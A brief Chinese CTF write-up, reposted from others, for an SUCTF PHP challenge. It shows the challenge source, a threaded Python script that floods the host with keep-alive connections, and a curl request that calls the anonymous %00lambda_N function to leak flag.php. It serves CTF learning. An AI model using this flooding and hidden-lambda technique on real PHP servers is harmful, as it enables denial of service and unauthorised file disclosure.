这题好像平台打不开,就百度了一下各位师傅写的wp
好像直接给出了源码
wp大佬的,大佬里面还有大大佬
在这里插入代码片
```<?php
$MY = create_function("","die(`cat flag.php`);");
$hash = bin2hex(openssl_random_pseudo_bytes(32));
eval("function SUCTF_$hash(){"
."global \$MY;"
."\$MY();"
."}");
if(isset($_GET['func_name'])){
$_GET["func_name"]();
die();
}
show_source(__FILE__);
直接给出exp
import requests
import socket
import time
from multiprocessing.dummy import Pool as ThreadPool
try:
requests.packages.urllib3.disable_warnings()
except:
pass
def run(i):
while 1:
HOST='45.76.173.177'
PORT=23334
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.sendall('GET / HTTP/1.1\nHost:web.suctf.asuri.org:81\nConnection: Keep-Alive\n\n')
# s.close()
print 'ok'
time.sleep(0.5)
i = 8
pool = ThreadPool( i )
result = pool.map_async( run,range(i) ).get(0xffff)
然后在linux中执行以下命令
curl -b idlefire "http://45.76.173.177:23334/?func_name=%00lambda_1"